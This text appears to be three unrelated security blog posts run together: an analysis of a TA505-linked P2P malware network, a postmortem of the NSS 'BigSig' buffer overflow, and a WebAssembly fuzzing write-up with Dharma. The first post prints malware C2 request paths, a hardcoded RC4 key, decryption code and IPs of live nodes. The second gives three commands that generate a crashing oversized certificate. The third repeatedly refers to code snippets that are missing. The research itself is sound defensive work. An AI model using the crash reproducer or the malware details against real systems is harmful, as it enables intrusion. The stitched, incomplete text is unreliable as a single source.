Tracking a P2P network related to TA505
This post is by Nikolaos Pantazopoulos and Michael Sandee
tl;dr – Executive Summary
For the past few months NCC Group has been closely tracking the operations of TA505 and the development of their various projects (e.g. Clop). During this research we encountered a number of binary files that we have attributed to the developer(s) of 'Grace' (i.e. FlawedGrace). These included a remote administration tool (RAT) used exclusively by TA505. The identified binary files are capable of communicating with each other through a peer-to-peer (P2P) network via UDP. While there does not appear to be any direct interaction between the identified samples and a host infected by 'Grace', we believe with medium to high confidence that there is a connection between the identified binaries and the developer(s) of 'Grace'.
In summary, we found the following:
- P2P binary files, which are downloaded along with other Necurs components (signed drivers, block lists)
- P2P binary files, which transfer certain information (records) between nodes
- Based on the network IDs of the identified samples, there seem to be at least three different networks running
- The programming style and dropped file formats match the development standards of ‘Grace’
History of TA505’s Shift to Ransomware Operations
2014: Emergence as a group
The threat actor, often referred to publicly as TA505, has been distinguished as an independent threat actor by NCC Group since 2014. Internally we used the name "Dridex RAT group". Initially it was a group that integrated quite closely with EvilCorp, utilising their Dridex banking malware platform to execute relatively advanced attacks, often using custom-made tools for a single purpose and repurposing commonly available tools such as 'Ammyy Admin' and 'RMS'/'RUT' to complement their arsenal. The attacks mostly consisted of compromising organisations and social-engineering victims into executing high-value bank transfers to corporate mule accounts. These operations included social-engineering their way past correctly implemented two-factor authentication with dual authorization by both the creator of a transaction and the authorizer.
2017: Evolution
In late 2017, EvilCorp and TA505 (the Dridex RAT group) ended their partnership. Our hypothesis is that EvilCorp had started to use the Bitpaymer ransomware to extort organisations rather than carry out banking fraud, building on the fact that they had already been using the Locky ransomware, which was attracting unwanted attention. EvilCorp's ability to execute enterprise ransomware across large-scale businesses was first demonstrated in May 2017. Their capability and success at pulling off such attacks stemmed from numerous years of experience in compromising corporate networks for banking fraud, specifically moving laterally to separate hosts controlled by employees who had the required access to and control of corporate bank accounts. The same lateral-movement techniques and tools (such as Empire, Armitage, Cobalt Strike and Metasploit) enabled EvilCorp to become highly effective in targeted ransomware attacks.
However in 2017 TA505 went on their own path and specifically in 2018 executed a large number of attacks using the tool called ‘Grace’, also known publicly as ‘FlawedGrace’ and ‘GraceWire’. The victims were mostly financial institutions and a large number of the victims were located in Africa, South Asia, and South East Asia with confirmed fraudulent wire transactions and card data theft originating from victims of TA505. The tool ‘Grace’ had some interesting features, and showed some indications that it was originally designed as banking malware which had latterly been repurposed. However, the tool was developed and was used in hundreds of victims worldwide, while remaining relatively unknown to the wider public in its first years of use.
2019: Clop and wider tooling
In early 2019, TA505 started to utilise the Clop ransomware, alongside other tools such as ‘SDBBot’ and ‘ServHelper’, while continuing to use ‘Grace’ up to and including 2021. Today it appears that the group has realised the potential of ransomware operations as a viable business model and the relative ease with which they can extort large sums of money from victims.
The remainder of this post dives deeper into a tool discovered by NCC Group that we believe is related to TA505 and the developer of 'Grace'. We assess that the identified tool is part of a bigger network, possibly related to 'Grace' infections.
Technical Analysis
The technical analysis we provide below focuses on three components of the execution chain:
- A downloader – Runs as a service (each identified variant has a different name) and downloads the rest of the components, along with a list of target processes/services that the driver uses while filtering information. Necurs has used similar downloaders in the past.
- A signed driver (both x86 and x64 available) – Filters processes/services in order to avoid detection and/or prevent removal. In addition, it injects the payload into a new process.
- Node tool – Communicates with other nodes in order to transfer victims' data.
It should be noted that different variants of all of the above components were identified. However, their core functionality and purpose remain the same.
Upon execution, the downloader generates a GUID (used as a bot ID) and stores it in the ProgramData
folder under the filename regid.1991-06.com.microsoft.dat
. Any downloaded file is stored temporarily in this directory. In addition, the downloader reads the version of crypt32.dll
in order to determine the version of the operating system.
Next, it contacts the command and control server and downloads the following files:
- t.dat – Expected to contain the string ‘kwREgu73245Nwg7842h’
- p3.dat – P2P Binary. Saved as ‘payload.dll’
- d1c.dat – x86 (signed) Driver
- d2c.dat – x64 (signed) Driver
- bn.dat – List of processes for the driver to filter. Stored as ‘blacknames.txt’
- bs.dat – List of services’ name for the driver to filter. Stored as ‘blacksigns.txt’
- bv.dat – List of files’ version names for the driver to filter. Stored as ‘blackvers.txt’.
- r.dat – List of registry keys for the driver to filter. Stored as ‘registry.txt’
The network communication of the downloader is simple. Firstly, it sends a GET request to the command and control server, then downloads the appropriate component and saves it to disk. Next, it reads the component from disk and decrypts it (using the RC4 algorithm) with the hardcoded key 'ABCDF343fderfds21'. After decrypting it, the downloader deletes the file.
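The decryption step can be reproduced with a plain RC4 implementation (a sketch for illustration; the key is the hardcoded one from the sample, while the example payload bytes are made up):

```python
def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); RC4 is symmetric, so the same call encrypts and decrypts."""
    S = list(range(256))
    j = 0
    # Key-scheduling algorithm
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    # Pseudo-random generation algorithm
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) % 256])
    return bytes(out)

KEY = b"ABCDF343fderfds21"  # hardcoded key from the downloader
ciphertext = rc4(KEY, b"MZ\x90\x00example payload")
print(rc4(KEY, ciphertext))  # round-trips back to the plaintext
```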
Depending on the component type, the downloader stores each of them differently. Any configurations (e.g. list of processes to filter) are stored in registry under the key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID
with the value name being the thread ID of the downloader. The data are stored in plaintext with a unique ID value at the start (e.g. 0x20 for the processes list), which is used later by the driver as a communication method.
In addition, in one variant, we detected a reporting mechanism to the command and control server for each step taken. This involves sending a GET request, which includes the generated bot ID along with a status code. The below table summarises each identified request (Table 1).
Request | Description |
/c/p1/dnsc.php?n=%s&in=%s | First parameter is the bot ID and the second is the formatted string (“Version_is_%d.%d_(%d)_%d__ARCH_%d”), which contains operating system info |
/c/p1/dnsc.php?n=%s&sz=DS_%d | First parameter is the bot ID and the second is the downloaded driver’s size |
/c/p1/dnsc.php?n=%s&er=ERR_%d | First parameter is the bot ID and the second is the error code |
/c/p1/dnsc.php?n=%s&c1=1 | The first parameter is the bot ID. Notifies the server that the driver was installed successfully |
/c/p1/dnsc.php?n=%s&c1=1&er=REB_ERR_%d | First parameter is the bot ID and the second is the error code obtained while attempting to shut down the host after finding Windows Defender running |
/c/p1/dnsc.php?n=%s&sz=ErrList_%d_% | First parameter is the bot ID, second parameter is the resulted error code while retrieving the blocklist processes. The third parameter is set to 1. The same command is also issued after downloading the blacklisted services’ names and versions. The only difference is on the third parameter, which is increased to ‘2’ for blacklisted services, ‘3’ for versions and ‘4’ for blacklisted registry keys |
/c/p1/dnsc.php?n=%s&er=PING_ERR_%d | First parameter is the bot ID and the second parameter is the error code obtained during the driver download process |
/c/p1/dnsc.php?n=%s&c1=1&c2=1 | First parameter is the bot ID. Informs the server that the bot is about to start the downloading process. |
/c/p1/dnsc.php?n=%s&c1=1&c2=1&c3=1 | First parameter is the bot ID. Notifies the server that the payload (node tool) was downloaded and stored successfully |
Driver Analysis
The downloaded driver is the same one that Necurs uses. It has already been analysed publicly [1] but, in summary, it does the following.
In the first stage, the driver decrypts shellcode, copies it to a new allocated pool and then executes the payload. Next, the shellcode decrypts and runs (in memory) another driver (stored encrypted in the original file). The decryption algorithm remains the same in both cases:
def _rol(value, bits, size):
    # Rotate `value` left by `bits` within a `size`-bit word.
    return ((value << bits) | (value >> (size - bits))) & ((1 << size) - 1)

xor_key = extracted_xor_key
bits = 15
result = b''
for i in range(0, len(encrypted), 4):
    data = encrypted[i:i+4]
    value = int.from_bytes(data, 'little') ^ xor_key
    result += (_rol(value, bits, 32) ^ xor_key).to_bytes(4, 'little')
Eventually, the decrypted driver injects the payload (the P2P binary) into a new process (‘wmiprvse.exe’) and proceeds with the filtering of data.
A notable piece of code of the driver is the strings’ decryption routine, which is also present in recent GraceRAT samples, including the same XOR key (1220A51676E779BD877CBECAC4B9B8696D1A93F32B743A3E6790E40D745693DE58B1DD17F65988BEFE1D6C62D5416B25BB78EF0622B5F8214C6B34E807BAF9AA).
Payload Attribution and Analysis
The identified sample is written in C++ and interacts with other nodes in the network using UDP. We believe that the downloaded binary file is related to TA505 for (at least) the following reasons:
- Same serialisation library
- Same programming style as 'Grace' samples
- Similar naming convention in the configuration keys as 'Grace' samples
- Same output files (dsx), which we have seen in previous TA505 compromises. DSX files have been used by 'Grace' operators to store information related to compromised machines.
Initialisation Phase
In the initialisation phase, the sample ensures that the configurations have been loaded and the appropriate folders are created.
All identified samples store their configurations in a resource named ‘XC’.
ANALYST NOTE: Due to limited visibility of other nodes, we were not able to identify the purpose of every configuration key.
The first configuration stores the following settings:
- cx – Parent name
- nid – Node ID. This is used as a network identification method during network communication. If the incoming network packet does not have the same ID then the packet is treated as a packet from a different network and is ignored.
- dgx – Unknown
- exe – Binary mode flag (DLL/EXE)
- key – RSA key to use for verifying a record
- port – UDP port to listen on
- va – Parent name. It includes the node IPs to contact.
The second configuration contains the following settings (or metadata as the developer names them):
- meta – Parent name
- app – Unknown. Probably specifies the variant type of the server. The following seem to be supported:
- target (this is the current set value)
- gate
- drop
- control
- mod – Specifies if current binary is the core module.
- bld – Unknown
- api – Unknown
- llr – Unknown
- llt – Unknown
Next, the sample creates a set of folders and files in a directory named ‘target’. These folders are:
- node (folder) – Stores records of other nodes
- trash (folder) – Holds files moved for deletion
- units (folder) – Unknown. Appears to contain PE files, which the core module loads.
- sessions (folder) – Active nodes’ sessions
- units.dsx (file) – List of ‘units’ to load
- probes.dsx (file) – Stores the connected nodes IPs along with other metadata (e.g. connection timestamp, port number)
- net.dsx (file) – Node peer name
- reports.dsx (file) – Used in recent versions only. Unknown purpose.
Network communication
After the initialisation phase has been completed, the sample starts sending UDP requests to a list of IPs in order to register itself into the network and then exchange information.
Every network packet has a header, which has the below structure:
struct Node_Network_Packet_Header
{
BYTE XOR_Key;
BYTE Version; // set to 0x37 ('7')
BYTE Encrypted_node_ID[16]; // XORed with XOR_Key above
BYTE Peer_Name[16]; // XORed with XOR_Key above. Connected peer name
BYTE Command_ID; //Internally called frame type
DWORD Watermark; //XORed with XOR_Key above
DWORD Crc32_Data; //CRC32 of above data
};
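Based on the layout above, the header can be decoded with a short Python sketch. How the single-byte key is applied to multi-byte fields, and what exactly the trailing CRC32 covers, are our assumptions (per-byte XOR, CRC over the raw preceding 39 bytes); all names are ours, not the malware author's.

```python
import struct
import zlib

HDR_LEN = 1 + 1 + 16 + 16 + 1 + 4 + 4  # 43 bytes in total

def xor_bytes(data: bytes, key: int) -> bytes:
    # Assumption: the one-byte XOR_Key is applied to every byte of a field.
    return bytes(b ^ key for b in data)

def parse_header(pkt: bytes) -> dict:
    if len(pkt) < HDR_LEN:
        raise ValueError("packet too short")
    xor_key = pkt[0]
    return {
        "xor_key": xor_key,
        "version": pkt[1],  # expected 0x37 ('7')
        "node_id": xor_bytes(pkt[2:18], xor_key),
        "peer_name": xor_bytes(pkt[18:34], xor_key),
        "command_id": pkt[34],
        "watermark": int.from_bytes(xor_bytes(pkt[35:39], xor_key), "little"),
        # Assumption: Crc32_Data covers the raw (still-obfuscated) header bytes.
        "crc_ok": struct.unpack_from("<I", pkt, 39)[0] == zlib.crc32(pkt[:39]),
    }
```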
When the sample needs to add additional information to a network packet, it uses the below structure:
struct Node_Network_Packet_Payload
{
DWORD Size;
DWORD CRC32_Data;
BYTE Data[Size]; // XORed with the same key used in the packet header (XOR_Key)
};
As expected, each network command (Table 2) adds a different set of information in the ‘Data’ field of the above structure but most of the commands follow a similar format. For example, an ‘invitation’ request (Command ID 1) has the structure:
struct Node_Network_Invitation_Packet
{
BYTE CMD_ID;
DWORD Session_Label;
BYTE Invitation_ID[16];
BYTE Node_Peer_Name[16];
WORD Node_Binded_Port;
};
The sample supports a limited set of commands, whose primary role is to exchange ‘records’ between nodes.
Command ID | Description |
1 | Requests to register in the other nodes (‘invitation’ request) |
2 | Adds node IP to the probes list |
3 | Sends a ping request. It includes number of active connections and records |
4 | Sends number of active connections and records in the node |
5 | Adds a new node IP:Port that the remote node will check |
6 | Sends a record ID along with the number of data blocks |
7 | Requests metadata of a record |
8 | Sends metadata of a record |
9 | Requests the data of a record |
10 | Receives data of a record and stores it on disk |
ANALYST NOTE: When information, such as record IDs or number of active connections/records, is sent, the binary adds the length of the data followed by the actual data. For example, in case of sending number of active connections and records:
01 05 01 02 01 02
The above is translated as:
2 active connections from a total of 5 with 2 records.
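The length-prefixed scheme described in the note can be sketched in Python (our reconstruction; little-endian byte order for multi-byte values is an assumption):

```python
def decode_counters(buf: bytes) -> list:
    # Each value is encoded as a one-byte length followed by that many value bytes.
    vals, i = [], 0
    while i < len(buf):
        n = buf[i]
        vals.append(int.from_bytes(buf[i + 1:i + 1 + n], "little"))
        i += 1 + n
    return vals
```

Applied to the example bytes, `decode_counters(bytes.fromhex("010501020102"))` yields `[5, 2, 2]`: a total of 5, 2 active connections and 2 records.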
Moreover, when a node receives a request, it sends an echo reply (includes the same packet header) to acknowledge that the request was read. In general, the following types are supported:
- Request type of 0x10 for echo request.
- Request type of 0x07 when sending data, which fit in one packet.
- Request type of 0x0D when sending data in multiple packets (size of payload over 1419 bytes).
- Request type of 0x21. It exists in the binary but is not used during network communication.
Record files
As mentioned already, a record has its own sub-folder under the ‘node’ folder with each sub-folder containing the below files:
- m – Metadata of record file
- l – Unknown purpose
- p – Payload data
The metadata file contains a set of information for the record, such as the node peer name and the node network ID. Among this information, the keys ‘tag’ and ‘pwd’ appear to be particularly important. The ‘tag’ key represents a command (distinct from the set in Table 2) that the node will execute once it receives the record. Currently, the binary only supports the command ‘updates’. The payload file (p) stores the update content encrypted with AES, using the value of the ‘pwd’ key as the AES key.
Even though we have not yet been able to capture any network traffic for the above command, we believe that it is used to update the currently running core module.
IoCs
Nodes’ IPs
45.142.213[.]139:555
195.123.246[.]14:555
45.129.137[.]237:33964
78.128.112[.]139:33964
145.239.85[.]6:3333
Binaries
SHA-1 | Description |
A21D19EB9A90C6B579BCE8017769F6F58F9DADB1 | P2P Binary |
2F60DE5091AB3A0CE5C8F1A27526EFBA2AD9A5A7 | P2P Binary |
2D694840C0159387482DC9D7E59217CF1E365027 | P2P Binary |
02FFD81484BB92B5689A39ABD2A34D833D655266 | x86 Driver |
B4A9ABCAAADD80F0584C79939E79F07CBDD49657 | x64 Driver |
00B5EBE5E747A842DEC9B3F14F4751452628F1FE | x64 Driver |
22F8704B74CE493C01E61EF31A9E177185852437 | Downloader |
D1B36C9631BCB391BC97A507A92BCE90F687440A | Downloader |
This shouldn't have happened: A vulnerability postmortem
Posted by Tavis Ormandy, Project Zero
Introduction
This is an unusual blog post. I normally write posts to highlight some hidden attack surface or interesting complex vulnerability class. This time, I want to talk about a vulnerability that is neither of those things. The striking thing about this vulnerability is just how simple it is. This should have been caught earlier, and I want to explore why that didn’t happen.
In 2021, all good bugs need a catchy name, so I’m calling this one “BigSig”.
First, let’s take a look at the bug, I’ll explain how I found it and then try to understand why we missed it for so long.
Analysis
Network Security Services (NSS) is Mozilla's widely used, cross-platform cryptography library. When you verify an ASN.1 encoded digital signature, NSS will create a VFYContext structure to store the necessary data. This includes things like the public key, the hash algorithm, and the signature itself.
struct VFYContextStr {
    SECOidTag hashAlg; /* the hash algorithm */
    SECKEYPublicKey *key;
    union {
        unsigned char buffer[1];
        unsigned char dsasig[DSA_MAX_SIGNATURE_LEN];
        unsigned char ecdsasig[2 * MAX_ECKEY_LEN];
        unsigned char rsasig[(RSA_MAX_MODULUS_BITS + 7) / 8];
    } u;
    unsigned int pkcs1RSADigestInfoLen;
    unsigned char *pkcs1RSADigestInfo;
    void *wincx;
    void *hashcx;
    const SECHashObject *hashobj;
    SECOidTag encAlg; /* enc alg */
    PRBool hasSignature;
    SECItem *params;
};

Fig 1. The VFYContext structure from NSS.
The maximum size signature that this structure can handle is whatever the largest union member is, in this case that’s RSA at 2048 bytes. That’s 16384 bits, large enough to accommodate signatures from even the most ridiculously oversized keys.
Okay, but what happens if you just....make a signature that’s bigger than that?
Well, it turns out the answer is memory corruption. Yes, really.
The untrusted signature is simply copied into this fixed-sized buffer, overwriting adjacent members with arbitrary attacker-controlled data.
The bug is simple to reproduce and affects multiple algorithms. The easiest to demonstrate is RSA-PSS. In fact, just these three commands work:
# We need 16384 bits to fill the buffer, then 32 + 64 + 64 + 64 bits to overflow to hashobj,
# which contains function pointers (bigger would work too, but takes longer to generate).
$ openssl genpkey -algorithm rsa-pss -pkeyopt rsa_keygen_bits:$((16384 + 32 + 64 + 64 + 64)) -pkeyopt rsa_keygen_primes:5 -out bigsig.key

# Generate a self-signed certificate from that key
$ openssl req -x509 -new -key bigsig.key -subj "/CN=BigSig" -sha256 -out bigsig.cer

# Verify it with NSS...
$ vfychain -a bigsig.cer
Segmentation fault

Fig 2. Reproducing the BigSig vulnerability in three easy commands.
The actual code that does the corruption varies based on the algorithm; here is the code for RSA-PSS. The bug is that there is simply no bounds checking at all; sig and key are arbitrary-length, attacker-controlled blobs, and cx->u is a fixed-size buffer.
case rsaPssKey:
    sigLen = SECKEY_SignatureLen(key);
    if (sigLen == 0) {
        /* error set by SECKEY_SignatureLen */
        rv = SECFailure;
        break;
    }
    if (sig->len != sigLen) {
        PORT_SetError(SEC_ERROR_BAD_SIGNATURE);
        rv = SECFailure;
        break;
    }
    PORT_Memcpy(cx->u.buffer, sig->data, sigLen);
    break;

Fig 3. The signature size must match the size of the key, but there are no other limitations. cx->u is a fixed-size buffer, and sig is an arbitrary-length, attacker-controlled blob.
I think this vulnerability raises a few immediate questions:
- Was this a recent code change or regression that hadn’t been around long enough to be discovered? No, the original code was checked in with ECC support on the 17th October 2003, but wasn't exploitable until some refactoring in June 2012. In 2017, RSA-PSS support was added and made the same error.
- Does this bug require a long time to generate a key that triggers the bug? No, the example above generates a real key and signature, but it can just be garbage as the overflow happens before the signature check. A few kilobytes of A’s works just fine.
- Does reaching the vulnerable code require some complicated state that fuzzers and static analyzers would have difficulty synthesizing, like hashes or checksums? No, it has to be well-formed DER, that’s about it.
- Is this an uncommon code path? No, Firefox does not use this code path for RSA-PSS signatures, but the default entrypoint for certificate verification in NSS, CERT_VerifyCertificate(), is vulnerable.
- Is it specific to the RSA-PSS algorithm? No, it also affects DSA signatures.
- Is it unexploitable, or otherwise limited impact? No, the hashobj member can be clobbered. That object contains function pointers, which are used immediately.
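For illustration, the overflow arithmetic behind the key size chosen in Fig 2 can be reproduced in a few lines of Python (assuming a 64-bit build and ignoring struct padding, as the comment in Fig 2 does):

```python
RSA_MAX_MODULUS_BITS = 16384
buffer_len = (RSA_MAX_MODULUS_BITS + 7) // 8   # fixed-size union: 2048 bytes
# Members sitting between u and hashobj in Fig 1: pkcs1RSADigestInfoLen
# (4 bytes), then pkcs1RSADigestInfo, wincx and hashcx (8-byte pointers each).
gap = 4 + 8 + 8 + 8
sig_len = buffer_len + gap                     # signature long enough to reach hashobj
key_bits = sig_len * 8                         # modulus size passed to openssl
```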
This wasn’t a process failure; the vendor did everything right. Mozilla has a mature, world-class security team. They pioneered bug bounties, and invest in memory safety, fuzzing and test coverage.
NSS was one of the very first projects included with oss-fuzz, it was officially supported since at least October 2014. Mozilla also fuzz NSS themselves with libFuzzer, and have contributed their own mutator collection and distilled coverage corpus. There is an extensive testsuite, and nightly ASAN builds.
I'm generally skeptical of static analysis, but this seems like a simple missing bounds check that should be easy to find. Coverity has been monitoring NSS since at least December 2008, and also appears to have failed to discover this.
Until 2015, Google Chrome used NSS, and maintained their own testsuite and fuzzing infrastructure independent of Mozilla. Today, Chrome platforms use BoringSSL, but the NSS port is still maintained.
- Did Mozilla have good test coverage for the vulnerable areas? YES.
- Did Mozilla/chrome/oss-fuzz have relevant inputs in their fuzz corpus? YES.
- Is there a mutator capable of extending ASN1_ITEMs? YES.
- Is this an intra-object overflow, or other form of corruption that ASAN would have difficulty detecting? NO, it's a textbook buffer overflow that ASAN can easily detect.
How did I find the bug?
I've been experimenting with alternative methods for measuring code coverage, to see if any have any practical use in fuzzing. The fuzzer that discovered this vulnerability used a combination of two approaches, stack coverage and object isolation.
Stack Coverage
The most common method of measuring code coverage is block coverage, or edge coverage when source code is available. I’ve been curious if that is always sufficient. For example, consider a simple dispatch table with a combination of trusted and untrusted parameters, as in Fig 4.
#include <stdio.h>
#include <string.h>
#include <limits.h>

static char buf[128];

void cmd_handler_foo(int a, size_t b) { memset(buf, a, b); }
void cmd_handler_bar(int a, size_t b) { cmd_handler_foo('A', sizeof buf); }
void cmd_handler_baz(int a, size_t b) { cmd_handler_bar(a, sizeof buf); }

typedef void (* dispatch_t)(int, size_t);

dispatch_t handlers[UCHAR_MAX] = {
    cmd_handler_foo,
    cmd_handler_bar,
    cmd_handler_baz,
};

int main(int argc, char **argv)
{
    int cmd;

    while ((cmd = getchar()) != EOF) {
        if (handlers[cmd]) {
            handlers[cmd](getchar(), getchar());
        }
    }
}

Fig 4. The coverage of command bar is a superset of command foo, so an input containing the latter would be discarded during corpus minimization. There is a vulnerability unreachable via command bar that might never be discovered. Stack coverage would correctly keep both inputs.[1]
To solve this problem, I’ve been experimenting with monitoring the call stack during execution.
The naive implementation is too slow to be practical, but after a lot of optimization I had come up with a library that was fast enough to be integrated into coverage-guided fuzzing, and was testing how it performed with NSS and other libraries.
Object Isolation
Many data types are constructed from smaller records. PNG files are made of chunks, PDF files are made of streams, ELF files are made of sections, and X.509 certificates are made of ASN.1 TLV items. If a fuzzer has some understanding of the underlying format, it can isolate these records and extract the one(s) causing some new stack trace to be found.
The fuzzer I was using is able to isolate and extract interesting new ASN.1 OIDs, SEQUENCEs, INTEGERs, and so on. Once extracted, it can then randomly combine or insert them into template data. This isn’t really a new idea, but is a new implementation. I'm planning to open source this code in the future.
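To illustrate the record-isolation idea (a toy sketch, not the actual fuzzer), a minimal walker over DER TLV items might look like this; it handles only single-byte tags plus the short and long length forms:

```python
def der_items(buf: bytes):
    # Yield (tag, value) pairs for consecutive TLV items in buf.
    i = 0
    while i < len(buf):
        tag, length = buf[i], buf[i + 1]
        i += 2
        if length & 0x80:  # long form: next N bytes hold the length, big-endian
            n = length & 0x7F
            length = int.from_bytes(buf[i:i + n], "big")
            i += n
        yield tag, buf[i:i + length]
        i += length
```

Recursing into SEQUENCE values (tag 0x30) lets a fuzzer pull out nested INTEGERs, OIDs and so on for later recombination.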
Do these approaches work?
I wish that I could say that discovering this bug validates my ideas, but I’m not sure it does. I was doing some moderately novel fuzzing, but I see no reason this bug couldn’t have been found earlier with even rudimentary fuzzing techniques.
Lessons Learned
How did extensive, customized fuzzing with impressive coverage metrics fail to discover this bug?
What went wrong
Issue #1 Missing end-to-end testing.
NSS is a modular library. This layered design is reflected in the fuzzing approach, as each component is fuzzed independently. For example, the QuickDER decoder is tested extensively, but the fuzzer simply creates and discards objects and never uses them.
extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) {
    char *dest[2048];

    for (auto tpl : templates) {
        PORTCheapArenaPool pool;
        SECItem buf = {siBuffer, const_cast<unsigned char *>(Data),
                       static_cast<unsigned int>(Size)};

        PORT_InitCheapArena(&pool, DER_DEFAULT_CHUNKSIZE);
        (void)SEC_QuickDERDecodeItem(&pool.arena, dest, tpl, &buf);
        PORT_DestroyCheapArena(&pool);
    }
Fig 5. The QuickDER fuzzer simply creates and discards objects. This verifies the ASN.1 parsing, but not whether other components handle the resulting objects correctly. |
This fuzzer might have produced a SECKEYPublicKey that could have reached the vulnerable code, but as the result was never used to verify a signature, the bug could never be discovered.
Issue #2 Arbitrary size limits.
There is an arbitrary limit of 10000 bytes placed on fuzzed input. There is no such limit within NSS; many structures can exceed this size. This vulnerability demonstrates that errors happen at extremes, so this limit should be chosen thoughtfully.
A reasonable choice might be 2^24-1 bytes, the largest possible certificate that can be presented by a server during a TLS handshake negotiation.
While NSS might handle objects even larger than this, TLS cannot possibly be involved, reducing the overall severity of any vulnerabilities missed.
Issue #3 Misleading metrics.
All of the NSS fuzzers are represented in combined coverage metrics by oss-fuzz, rather than their individual coverage. This data proved misleading, as the vulnerable code is fuzzed extensively but by fuzzers that could not possibly generate a relevant input.
This is because fuzzers like the tls_server_target use fixed, hardcoded certificates. This exercises code relevant to certificate verification, but only fuzzes TLS messages and protocol state changes.
What Worked
- The design of the mozilla::pkix validation library prevented this bug from being worse than it could have been. Unfortunately it is unused outside of Firefox and Thunderbird.
It’s debatable whether this was just good fortune or not. It seems likely RSA-PSS would eventually have been permitted by mozilla::pkix, even though it is not today.
Recommendations
This issue demonstrates that even extremely well-maintained C/C++ can have fatal, trivial mistakes.
Short Term
- Raise the maximum size of ASN.1 objects produced by libFuzzer from 10,000 to 2^24-1 = 16,777,215 bytes.
- The QuickDER fuzzer should call some relevant APIs with any objects successfully created before destroying them.
- The oss-fuzz code coverage metrics should be divided by fuzzer, not by project.
Solution
This vulnerability is CVE-2021-43527, and is resolved in NSS 3.73.0. If you are a vendor that distributes NSS in your products, you will most likely need to update or backport the patch.
Credits
I would not have been able to find this bug without assistance from my colleagues from Chrome, Ryan Sleevi and David Benjamin, who helped answer my ASN.1 encoding questions and engaged in thoughtful discussion on the topic.
Thanks to the NSS team, who helped triage and analyze the vulnerability.
[1] In this minimal example, a workaround if source was available would be to use a combination of sancov's data-flow instrumentation options, but that also fails on more complex variants.
Introduction to Dharma - Part 2 - Making Dharma More User-Friendly using WebAssembly as a Case-Study
In the first part of our Dharma blogpost, we utilized Dharma to write grammar files to fuzz Adobe Acrobat JavaScript API's. Learning how to generate JavaScript code using Dharma opened a whole new area of research for us. In theory, we can target anything that uses JavaScript. According to the 2020 Stack Overflow Developer Survey, JavaScript sits comfortably in the #1 rank spot of being the most commonly used language in the world:
In this blogpost, we'll focus more on fuzzing WebAssembly API's in Chrome. To start with WebAssembly, we went and read the documentation provided by MDN.
We'll start by walking through the basics and getting familiarized with the idea of WebAssembly and how it works with browsers. WebAssembly helps to resolve many issues by using pre-compiled code that gets executed directly, running at near native speed.
After we had a basic idea of WebAssembly and its uses, we started building some simple applications (Hello World!, a calculator, etc.). By doing that, we got more comfortable with WebAssembly's APIs, syntax and semantics.
Now we can start thinking about fuzzing WebAssembly.
If we break a WebAssembly application down, we'll notice that it's made of three components:
Pure JavaScript Code.
WebAssembly APIs.
WebAssembly Module.
Since we're trying to fuzz everything under the sun, we'll start with the first two components and then tackle the third one later.
JavaScript & WebAssembly API
This part contains a lot of JavaScript code. We need to pay attention to the syntactical part of the language or we'll end up getting logical and syntax errors that are just a headache to deal with. The best way to minimize errors, and easily generate syntactically (and hopefully logically) correct JavaScript code is using a grammar-based text generation tool, such as Domato or Dharma.
To start, we went to MDN and pulled all the WebAssembly APIs. Then we built a Dharma logic for each API. While doing so, we faced a lot of issues that could slow down or ruin our fuzzer. That said, we'll go over these issues later on in this blog.
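To illustrate the general mechanism of grammar-based generation (a toy Python sketch; the rules below are made up for this example and are not our actual Dharma grammar):

```python
import random

# Hypothetical mini-grammar: each rule maps to a list of alternatives, and
# +rule+ placeholders are expanded recursively, Dharma-style.
GRAMMAR = {
    "module": ["new WebAssembly.Module(+buffer+)"],
    "buffer": ["wasmCode", "new Uint8Array(+digit+)"],
    "digit": [str(d) for d in range(10)],
}

def expand(rule: str, rng=random) -> str:
    # Pick an alternative, then substitute placeholders until none remain.
    out = rng.choice(GRAMMAR[rule])
    while "+" in out:
        pre, name, post = out.split("+", 2)
        out = pre + expand(name, rng) + post
    return out
```

Each call to `expand("module")` emits a syntactically valid JavaScript fragment, which is the property we rely on Dharma for at a much larger scale.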
To instantiate a WebAssembly module, we have to use the WebAssembly.instantiate function, which takes a module (pre-compiled WebAssembly module) and optionally a buffer; here's how it looks as JavaScript code:
The process is simple: we'll have to test the code, understand how it works and then build Dharma logic for it. The same process applies to all the APIs. As a result, the function above can be translated to the following in Dharma:
The output should be similar to the following:
What we're trying to achieve is covering all possible arguments for that given function.
On a side note: The complexity and length of the Dharma file dramatically increased ever since we started working on this project. Thus, we decided to give code snippets rather than the whole code for brevity.
Coding Style
We had to follow a certain coding style during our journey in writing Dharma files for WebAssembly for different reasons.
First, in order to differentiate our logic from Dharma logic - Dharma provides a common.dg file, which you can find in the following path: dharma/grammars/common.dg. This file contains helpful logic, such as digit, which will give you a number between 0-9, and short_int, which will give you a number between 0-65535. This file is useful but generic, and sometimes we need something more specific to our logic. That said, we ended up creating our own logic:
We also decided to go with different naming conventions, so we can utilize the auto-complete feature of our text editor. Dharma uses snake_case for naming; we decided to go with camelCase naming instead.
Also, for our coding style, we decided to use some sort of prefix and postfix to annotate the logic. Let's take variables for example: we start any variable with var followed by the class or function name:
This will make it easy to use later and easier to understand in general.
We applied the same concept for parameters as well. We start with the function's name followed by Param as a naming convention:
Since we're mentioning parameters, let's go over an example of an idea we mentioned earlier. If a function has one or more optional parameters, we create a section for it to cover all the possibilities:
Also, as part of our coding style, we used comments to divide the file into sections, so we can group related logic and reach a certain function easily:
That said, you can easily find certain functions or parameters under their related section. This is a fairly good solution to make the file more manageable. At a certain point you have to make a file for each section, and group shared logic in an abstract shared file to eliminate the duplication - maybe we'll talk about this in another blog (maybe not xD).
Testing and validation
After we finished the first version of our Dharma logic file, we ran it and noticed a lot of JavaScript logical errors: small mistakes that we normally make, like forgetting a bracket or a comma. To solve these errors, we created a builder section where we build our logic:
We had to go through each line one by one to eliminate all the possible logical errors. We also created a wrapper function that wraps the code with try-catch blocks:
By doing so, we made it much easier to isolate and test the possible output.
While we were working on the Dharma logic file we faced another issue. When you want your JavaScript to import something from the .wasm module (e.g. a table or a memory buffer), you have to provide it from the .wasm module. For that, we ended up making many modules that provide whatever we import from the generated JS logic, and export whatever we import from .wasm modules. In brief, we built a lot of .wasm modules, each one exporting or importing what the JavaScript needs to test an API. An example of this logic:
